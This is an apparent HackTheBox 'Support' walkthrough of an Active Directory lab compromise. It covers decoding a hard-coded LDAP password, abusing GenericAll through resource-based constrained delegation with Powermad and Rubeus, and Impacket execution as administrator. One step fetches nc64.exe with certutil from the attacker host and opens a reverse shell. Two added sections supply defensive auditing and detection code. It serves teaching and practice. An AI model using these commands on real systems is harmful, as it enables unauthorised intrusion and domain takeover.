HackTheBox - Support Walkthrough
Support is an Easy difficulty Windows machine that features an SMB share that allows anonymous authentication. After connecting to the share, an executable is found which is used to query the machine’s LDAP server for available users. By reverse engineering, network analysis, or emulation, the password that the binary uses to bind to the LDAP server is recovered, and it can be used to run further LDAP queries. A user called `support` appears in the user list, and the `info` field turns out to contain his password, which allows a WinRM connection to the machine. Once on the machine, ‘SharpHound’ is used to collect domain information, and ‘BloodHound’ shows that the ‘Shared Support Accounts’ group, of which the ‘support’ user is a member, has ‘GenericAll’ access on the Domain Controller. A Resource Based Constrained Delegation attack then yields a shell as “NT Authority\System”.
Machine Info
Steps taken to solve this machine
- Network scanning (nmap, rustscan, dig)
- Web spidering (dirsearch, feroxbuster, nikto, gobuster)
- SMB share enumeration
- Binary decompilation (UserInfo.exe) using the dnSpy tool
- Writing a Python script to decode the LDAP authentication credentials
- LDAP enumeration
- Reviewing permissions in the LDAP domain, obtaining credentials and the user flag
- Uploading the SharpHound binary, collecting a zip file and analysing it in BloodHound
- Identifying the vulnerability in AD: a ‘GenericAll’ permission that enables a Kerberos Resource-based Constrained Delegation attack
- Using Impacket, Powermad and Rubeus to conduct the attack
- Privilege escalation (4 different methods)
Enumeration
1. Rustscan
rustscan --accessible -a 10.129.129.84 -r 1-65535 --ulimit 65535
Automatically increasing ulimit value to 65535.
Open 10.129.129.84:53
Open 10.129.129.84:88
Open 10.129.129.84:135
Open 10.129.129.84:139
Open 10.129.129.84:389
Open 10.129.129.84:445
Open 10.129.129.84:464
Open 10.129.129.84:593
Open 10.129.129.84:636
Open 10.129.129.84:3268
Open 10.129.129.84:3269
Open 10.129.129.84:9389
Open 10.129.129.84:49664
Open 10.129.129.84:49667
Open 10.129.129.84:49676
Open 10.129.129.84:49690
Open 10.129.129.84:49695
Open 10.129.129.84:49708
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-15 02:24 EDT
Initiating Ping Scan at 02:24
Scanning 10.129.129.84 [2 ports]
Completed Ping Scan at 02:24, 3.00s elapsed (1 total hosts)
Nmap scan report for 10.129.129.84 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
2. Nmap
# Nmap 7.93 scan initiated Tue Aug 15 02:25:14 2023 as: nmap -A -vvv -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN support.nmap 10.129.129.84
Nmap scan report for 10.129.129.84
Host is up, received echo-reply ttl 127 (0.19s latency).
Scanned at 2023-08-15 02:25:15 EDT for 70s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-15 06:25:22Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=8/15%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=64DB1A91%P=x86_64-pc-linux-gnu)
SEQ(SP=FE%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.004 days (since Tue Aug 15 02:21:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41632/tcp): CLEAN (Timeout)
| Check 2 (port 59875/tcp): CLEAN (Timeout)
| Check 3 (port 38700/udp): CLEAN (Timeout)
| Check 4 (port 30853/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-15T06:25:44
|_ start_date: N/A
TRACEROUTE (using port 3269/tcp)
HOP RTT ADDRESS
1 185.85 ms 10.10.14.1
2 186.24 ms 10.129.129.84
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 15 02:26:25 2023 -- 1 IP address (1 host up) scanned in 70.69 seconds
Network enumeration
$ dig +nocmd @10.129.129.84 support.htb any +multiline +short +answer
10.129.129.84
dc.support.htb.
dc.support.htb. hostmaster.support.htb. 128 900 600 86400 3600
Adding the domain names to our /etc/hosts file
127.0.0.1 localhost
127.0.1.1 solaris.localdomain solaris
10.129.129.84 dc.support.htb support.htb
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter
SMB enumeration
smbclient -N -L //10.129.127.134
We have a share named ‘support-tools’. Connecting to it gives us a few files, which we download to our machine. After looking at each of them, ‘UserInfo.exe’ seems the most interesting, so I load it into dnSpy, where we can see some interesting things. In the decompiled code we find an encoded string together with a key. At first it seems like AES encryption, but the routine is actually a base64 decode followed by a byte-wise XOR with the repeating key and the constant 223. I wrote a Python script that reproduces it and recovers the password. The script is given below:
#!/usr/bin/env python3
# Reproduces the routine found in UserInfo.exe: base64-decode the stored
# string, then XOR every byte with the repeating key and the constant 223.
import base64

def decrypt_password(enc_password, key):
    key_bytes = key.encode('utf-8')
    enc_bytes = base64.b64decode(enc_password)
    dec_bytes = bytearray(enc_bytes)
    for i in range(len(dec_bytes)):
        # XOR with the key byte at the same position (key repeats) and 0xDF
        dec_bytes[i] = dec_bytes[i] ^ key_bytes[i % len(key_bytes)] ^ 223
    return dec_bytes.decode('utf-8')

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"
decrypted_password = decrypt_password(enc_password, key)
print("Decrypted Password:", decrypted_password)
After running the script we get a password string that can be used for LDAP enumeration. The enumeration commands are given below:
ldapsearch -x -H ldap://dc.support.htb -D "SUPPORT\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB"
ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb
After running these commands we get information about the LDAP domain users and their permissions, written out as JSON, grep and HTML files. From there we can identify that the ‘support’ user has the most permissions. In the domain users list we also find something interesting.
Looks like a password :) lol. Maybe we can log in with Evil-WinRM as the support user using this password. After connecting we can get our user flag.
evil-winrm -i dc.support.htb -u support -p 'Iron*****************Watchful'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evi
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\support\Documents>
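The `info` field finding above is a classic case of credentials parked in free-text AD attributes, where anyone with a bind account can read them. As an added example that is not part of the original walkthrough, the Python script below audits a user dump for that mistake. It assumes the JSON layout ldapdomaindump writes (a list of entries with a dn and an attributes map whose values are lists); the entries it scans are constructed, and the password-like strings in them are made up.

```python
#!/usr/bin/env python3
"""Audit an LDAP user dump for secrets stored in free-text attributes.

Added example (not part of the original walkthrough). It assumes the
JSON layout that ldapdomaindump writes for domain_users.json: a list of
entries, each with a "dn" and an "attributes" map whose values are lists.
The sample entries below are constructed; no real credentials appear.
"""
import json
import math
import re

# Free-text attributes that admins sometimes misuse as a notepad.
FREE_TEXT_ATTRS = ("info", "description", "comment")

# A password-looking token mixes at least three of these character classes.
CLASSES = (re.compile(r"[a-z]"), re.compile(r"[A-Z]"),
           re.compile(r"\d"), re.compile(r"[^A-Za-z0-9\s]"))

# Constructed sample dump in the assumed ldapdomaindump layout.
SAMPLE_DUMP = json.dumps([
    {"dn": "CN=support,CN=Users,DC=example,DC=test",
     "attributes": {"sAMAccountName": ["support"],
                    "info": ["Tmp-Pw0rd#Demo2023"],        # constructed value
                    "description": ["Shared support account"]}},
    {"dn": "CN=alice,CN=Users,DC=example,DC=test",
     "attributes": {"sAMAccountName": ["alice"],
                    "description": ["Accounting dept, ext 4411"]}},
    {"dn": "CN=svc_backup,CN=Users,DC=example,DC=test",
     "attributes": {"sAMAccountName": ["svc_backup"],
                    "description": ["pwd: Backup!Svc_9q"]}},  # constructed value
])

def shannon_entropy(s):
    """Bits per character of the string; plain words score low."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def looks_like_password(token):
    """Heuristic: long enough, mixed character classes, not a plain word."""
    if len(token) < 8 or len(token) > 64:
        return False
    classes = sum(1 for rx in CLASSES if rx.search(token))
    return classes >= 3 and shannon_entropy(token) >= 3.0

def find_exposed_secrets(dump_json):
    """Return [(sAMAccountName, attribute, token)] for suspicious values."""
    findings = []
    for entry in json.loads(dump_json):
        attrs = entry.get("attributes", {})
        sam = (attrs.get("sAMAccountName") or ["?"])[0]
        for name in FREE_TEXT_ATTRS:
            for value in attrs.get(name, []):
                for token in value.split():
                    if looks_like_password(token):
                        findings.append((sam, name, token))
    return findings

if __name__ == "__main__":
    for sam, attr, token in find_exposed_secrets(SAMPLE_DUMP):
        print(f"{sam}: attribute '{attr}' holds a password-like value ({token})")
```

Run it against domain_users.json from ldapdomaindump to get the list of accounts whose info/description/comment values need cleaning up; the heuristic trades some false positives for recall, so review the output by hand and rotate any password it finds.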
Road to Privilege Escalation
Now that we have gained access as a local user, we look for security misconfigurations that let us escalate privileges on the machine. SharpHound and BloodHound can find AD security misconfigurations, so first we upload SharpHound to the target machine and run it as shown below:
Evil-WinRM PS C:\Users\support\Documents> upload /home/kali/Downloads/Tools/SharpHound/SharpHound.exe
Info: Uploading /home/kali/Downloads/Tools/SharpHound/SharpHound.exe to SharpHound.exe
Data: 1211048 bytes of 1211048 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\Users\support\Documents>
Then we run SharpHound on the target; it writes the collected domain data to a zip file.
We then transfer this zip file to our Kali machine and drag it into BloodHound. After spending some time on enumeration, the “Shortest Path to Unconstrained Delegation Systems” query shows that the “SHARED SUPPORT ACCOUNTS@SUPPORT.HTB” group has the “GenericAll” permission on “DC.SUPPORT.HTB”. The “support” user is a member of the “shared support accounts@support.htb” group, which gives us “GenericAll” authority over “DC.SUPPORT.HTB” and which we can use to escalate our privileges.
Now that we know about the ‘GenericAll’ permission we can craft our attack. To understand it in full, this documentation can help. We also need to perform a ‘Kerberos Resource-based Constrained Delegation attack’: if you have WRITE privilege on a computer’s AD object, it is possible to gain code execution with elevated privileges on that computer. There are some tools we need for these steps:
We then upload Powermad and Rubeus to our target machine.
Then we will follow the below steps:
- Create a new computer object in AD (a fake computer).
- Configure the target computer object (the DC) so that the fake computer is allowed to delegate to it, i.e. resource-based constrained delegation.
- Produce the password hash for the new fake computer account.
# Importing PowerMad
Import-Module ./powermad.ps1
# Creating variables for creating fake computer
Set-Variable -Name "ROLEX007" -Value "AMIHACKER"
Set-Variable -Name "victimcomputer" -Value "DC"
# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "ROLEX007").Value -Password $(ConvertTo-SecureString 'secretpassword' -AsPlainText -Force) -Verbose
# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege
Set-ADComputer (Get-Variable -Name "victimcomputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "ROLEX007").Value + '$')
# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "victimcomputer").Value -Properties PrincipalsAllowedToDelegateToAccount
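From the defender's side, each of the steps above leaves a trace: creating the fake computer produces Security event 4741 (Audit Computer Account Management), and writing the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute produces event 5136 once directory-service change auditing is enabled on the object. The Python below is an added example, not part of the original walkthrough, that applies those two rules to constructed event records; the field names follow the Windows event XML but are simplified, and the privileged-account list is a placeholder.

```python
#!/usr/bin/env python3
"""Detection logic for the two noisy steps of an RBCD setup.

Added example, not from the original walkthrough. Assumes parsed Windows
Security events as dicts with (simplified) XML field names:
  4741  A computer account was created          -> SubjectUserName, TargetUserName
  5136  A directory service object was modified -> ObjectDN, AttributeLDAPDisplayName
The sample records below are constructed.
"""
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Placeholder: accounts allowed to create or reconfigure computer objects.
# In production derive this from group membership rather than a literal.
PRIVILEGED = {"SUPPORT\\Administrator", "SUPPORT\\svc_deploy"}

# Constructed sample events (dicts standing in for parsed EVTX records).
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "SUPPORT\\support"},
    {"EventID": 4741, "SubjectUserName": "SUPPORT\\support",
     "TargetUserName": "AMIHACKER$"},
    {"EventID": 4741, "SubjectUserName": "SUPPORT\\svc_deploy",
     "TargetUserName": "WS-1042$"},
    {"EventID": 5136, "SubjectUserName": "SUPPORT\\support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"EventID": 5136, "SubjectUserName": "SUPPORT\\Administrator",
     "ObjectDN": "CN=WS-1042,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description"},
]

def detect_rbcd_abuse(events):
    """Return (rule, detail) alerts for unprivileged machine-account creation
    and for any write to msDS-AllowedToActOnBehalfOfOtherIdentity."""
    alerts = []
    for ev in events:
        who = ev.get("SubjectUserName", "?")
        eid = ev.get("EventID")
        if eid == 4741 and who not in PRIVILEGED:
            # The default ms-DS-MachineAccountQuota (10) lets any user do this.
            alerts.append(("machine-account-quota",
                           f"{who} created computer {ev.get('TargetUserName')}"))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            dn = ev.get("ObjectDN", "")
            # A domain controller being made delegatable is the worst case.
            sev = "high" if "OU=Domain Controllers" in dn else "medium"
            alerts.append((f"rbcd-write-{sev}", f"{who} set {RBCD_ATTR} on {dn}"))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect_rbcd_abuse(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The first rule is prevented outright by setting ms-DS-MachineAccountQuota to 0 so ordinary users cannot add computer accounts; the second only fires if the ‘Audit Directory Service Changes’ subcategory is enabled and the computer objects carry a SACL that audits attribute writes.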
After that we run Rubeus on the target machine.
./Rubeus.exe s4u /user:AMIHACKER$ /rc4:DC265511A1D1A7A3CE6F6D2A3FB6BBE1 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: DC265511A1D1A7A3CE6F6D2A3FB6BBE1
[*] Building AS-REQ (w/ preauth) for: 'support.htb\AMIHACKER$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFcDCCBWygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBEAwggQ8oAMCARKhAwIBAqKCBC4EggQq1lnHsC70
Sqgzzy4oPZTnXpDw58Zq0ipB1GgYHIaq3Mu+IbbD85uMfwdmjvQMuotK9i+cTDMS9RRjwg0x13p338TI
9DNMVF46KsLb/BYKDAN/GsjSDnfq0B1Gdm++ECrJbouK4oTc4HM0mIYp4D0lvDBkWEt2Pw9r9YKSd0UI
dltXtWJ7ZzwSCPGOo8iBDJWoAWaOhKKxlweDZOoP8qPyUfGau/Y/F3GxnyW8utlsT/UtjkyXTCwOgnnN
Nuh+wlpFRgr5Oqpr18B8QZ+fLCQ1nIVyyW4JJ7v7XLCY4swg2wxm+iZAxLPuQh2CBo9WLSUFgoFE1/wg
CHlKGD4YbpPO4e65ChLooKbabr4bt+ZkR7ZvJq5ftso4bUWJpFzWZj8FfmcCj4rmEZWH8eFJZ7PjC0+I
+xDgUDqyUE8UwaL29ELjOh3CgKgt1iC+C+//yQrcIhKzTJa1GP0ypvNvAVa2ZGj/XNLt4uFGZ5QkRXs0
bsKwaC0iyuUay2tj1HHIx+W61wwG7gfYCr+1jhM23HKxQKRLwENIecoPd1hYnZtIkteymoaIVfh7q0PH
gC/H2mYWTEFStudwmGtzZpXinZanwckuEbawEV6p+aFXV96qlF5B/ZYBvcvMeK01t7c2by1iyM5hNW1m
DbY7eqVSv5LcABOTbsnPAxyRT5b1Fdo/go1XCqb1qthx5TKpdTLW6Un8m/X8aHbVTeTLnl/B5J/xUcL+
MTOzJd/3P/Uv00uphFnxs/w2UVZ8lIo5SOUohxT7gNON9LcL4nLrg6vuu1McmQLbP0Y7DemlIKWfIz7D
TvVnHBylUHm8yRvjZDrefSu201DR1GftgvV0zrb+iCmToR/9tNaWypYTozGayE9FmQsLwnLpcKatewSB
dw6Y+GduxLi9pdV9F+6utTDVNYg8qv9PXoEs3lCOUc9q2pavUtD/fUYhFc9Z3SF/eO1ttI4IiPqbAgMN
MuOy1br6rZpg5hrBZ7/LjFrlOFCVeDnk+N1TEJvxS9QpEYyvupiPfxPobUwpl4NC4eJ1OZG88G8wKbZD
gukGNsqHewrsmcJbe0AB7j227jZKF/4uUkUKQIfoppYmosKHJ98tA3claAYVJ8Tjc61OaOxRxFRH8bGq
Ci+QfZZh1ESFRnn2Pzu9Ft4dAeHoEzxkAsKWPx/Jp4PZzOPENfk7E9quXkOZw2pTbl+POqwe31tKSYl6
lK/Y9+3kwigvioBqHxVhxtmUVRQ9I0ds5hvNodBD4xAAq3rxrrOnq1IEy9kjiEdLJ80DEXbYycdXiR75
bEcevFY8JZLRWBHPOGJpgg8WTaJ0Kh8RuoqcshkX790Zd9ZSxHy7YYfvF+OGyoTJCabj8kb/fr4A122G
1XHt4Ah2Q+hQUR09sG8Z4hMZtceOkrO8cSgbql20tebK/H8tow5ww6OB1TCB0qADAgEAooHKBIHHfYHE
MIHBoIG+MIG7MIG4oBswGaADAgEXoRIEEGui/u5RNRxMVRy3llVwr2KhDRsLU1VQUE9SVC5IVEKiFzAV
oAMCAQGhDjAMGwpBTUlIQUNLRVIkowcDBQBA4QAApREYDzIwMjMwODE1MTUwNjA5WqYRGA8yMDIzMDgx
NjAxMDYwOVqnERgPMjAyMzA4MjIxNTA2MDlaqA0bC1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3Ji
dGd0GwtzdXBwb3J0Lmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'AMIHACKER$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'AMIHACKER$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
doIFqDCCBaSgAwIBBaEDAgEWooIExDCCBMBhggS8MIIEuKADAgEFoQ0bC1NVUFBPUlQuSFRCohcwFaAD
AgEBoQ4wDBsKQU1JSEFDS0VSJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxlOhrDdOn9dddQXO5nWZD
6Jn0ZJyyvP2XPVpQ4+CQjJbqFpCoa92fs9KvIaXjCxh3gx9L2K7hRnbdjP4yOCrD4kyoeea+38cazSgb
uu5Kh0p8OBqpQxgM3hUzDh39DD0IniYykum/W4T0DPvNOrGP9mfqcnLNX8/yUi8gWoi21TyEXNDVXdyC
HQrjLZvVSWsrBszLz5zZJdZy9XLeDsLpfbpfvnM0oTt3SS9s4pEGyF6WrzTomxJtme8K+g1vJ3SZNaxo
Z1MR8R7w/o0vcEdzyBX9tArXID8x2byG5WhR7r5NIsHExjDRaH3ANRsn35QnlgwHZyOACOicku2dOjr6
04LCurJA57N484Rczf1Q0QDX00ohsEGqR1sjXiMkWLdj51lqWZNGqbmofm+yVuavijFtwxm34CZ28l1x
Dc5E1256sZO+WOcGn6Fb4KxADBCH2RJZObXtZsrTQvfbygEh2yPcGz2+/pPge/YwROZnHuSZ+t8g2IGg
MyPpIVfZLzIHgx+085kpvyb23RPfuVPcCSEkvnb8z6Qxkh2K/9CYzHKEOakeVElIY/eTJeUyJPysfvk3
pbER2/h/t1Xc5VWRXq4YzpyTr0SHjSai9AkU0aXak040KcaDTA4Bw8BIWzzCcIx5vNZeaAHdED1YAkrz
0wWwsoYO+LoC1Z84wrbtqaj7iml8QqCSEwDeaSltHo3gM8RSqbHowhOxh0uzxDR9TSClexucwhon5O0j
Xy5m4oZBfM2mW23L4fDJhFQ4iXwZfKLkykpWvW9+umZ3Q5fG017dscLLxxLYxKLRLGWlRXnY8fIXQ/PS
ehdNYzMMJpWm7oAas1wckiH9ML7irXcE5AfUS0jIVEN9Ctsln/tQwnUxLYMh8nc2+2novDpFAY0RLDcw
w9QZt0F+UECx994cYNj2Qy2Gg4McSmxloHFiB2+NPgg3R5PJVVWURw1xK+/+awTcxnTlwzX+H3u0A6M8
2LUqvI2Yt7WZ2LmQoFRGSR7/O2iSXSyHtjGeht2Bi4f7Xef1p/fA5f7zykArL86V8EXzyhqAkN448gsa
/reO8hKwQADbmJ5o4vaQX6erf9MoRTCY5GY1lix8FugcgnVTFCL/aJP7X2I6eo91UdGhNNgxFY5ljC4D
oGhaSQR6Tzq/XCji0XgtA6zlCAOwaBOrrDcy1RInWkP79/UK4y2TlKU13/Hgh38RlFja1i3ANN/JDXZk
fg5X7aaWEPs2edhGiDwIxDCHoZ9VWxNoQGqFuXzNt1M6aHmM4eHDZCtiTf4yNCBKZmkS0hoEOMVWaAM2
mmFaavHXO4VeJ5ReNDlEpwrurbSudDq/Ax+btbGjUEElSqoRJAniUrYNKiKYiUjrCXZfF1ZPSgKxJo2C
94pJNj/yIDLoauRlgFzLXrhEcVwgYZTrDrYZhmcDnxmsPkwE919qPf+CHFt29XzshwL+gB+GY4FgI4kh
sUTvOAUvj6duQPCOLtDNOG5MxhC/B/2/r2pk31Hil6Hwj3fLb5o4Umhho4HPMIHMoAMCAQCigcQEgcF9
gb4wgbuggbgwgbUwgbKgGzAZoAMCARehEgQQDpzLiDEuBk6SsCtS6LrNAKENGwtTVVBQT1JULkhUQqIa
MBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyMzA4MTUxNTA2MTBaphEYDzIw
MjMwODE2MDEwNjA5WqcRGA8yMDIzMDgyMjE1MDYwOVqoDRsLU1VQUE9SVC5IVEKpFzAVoAMCAQGhDjAM
GwpBTUlIQUNLRVIk
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
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
MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!
Then we take the last base64 ticket that Rubeus printed (the one for SPN cifs/dc.support.htb), remove all the line breaks and spaces, and save it as ticket.kirbi.b64. Then we run the command below.
base64 -d ticket.kirbi.b64 > ticket.kirbi
After that we can use Impacket's ticketConverter.py to convert the .kirbi file to .ccache format.
$ ./ticketConverter.py ticket.kirbi admin.ccache
Impacket v0.9.25.dev1+20220119.101925.12de27dc - Copyright 2021 SecureAuth Corporation
[*] converting kirbi to ccache...
[+] done
Now we will use 4 different tools to get administrator access on the machine.
1st method
We can use psexec to get administrator access. First we need to point the KRB5CCNAME variable at our admin.ccache, then run the commands.
$ export KRB5CCNAME=admin.ccache
$ python3 psexec.py support.htb/administrator@dc.support.htb -no-pass -k
2nd method
We can use smbexec tool.
$ export KRB5CCNAME=admin.ccache
$ python3 smbexec.py support.htb/administrator@dc.support.htb -no-pass -k
3rd method
We can use wmiexec tool.
$ export KRB5CCNAME=admin.ccache;./wmiexec.py support.htb/administrator@dc.support.htb -no-pass -k
4th method
We can use the atexec tool. With it we download the nc64 binary onto the target with certutil and then run it to get a reverse shell as administrator back to our Kali machine. We also need a Python web server running on our machine to serve the binary.
export KRB5CCNAME=admin.ccache;./atexec.py -k -no-pass dc.support.htb 'certutil.exe -f -urlcache http://10.10.14.72:8000/nc64.exe nc.exe & nc.exe -e cmd 10.10.14.72 1337'
Then we get a shell as NT AUTHORITY\SYSTEM on our listener.
Conclusion
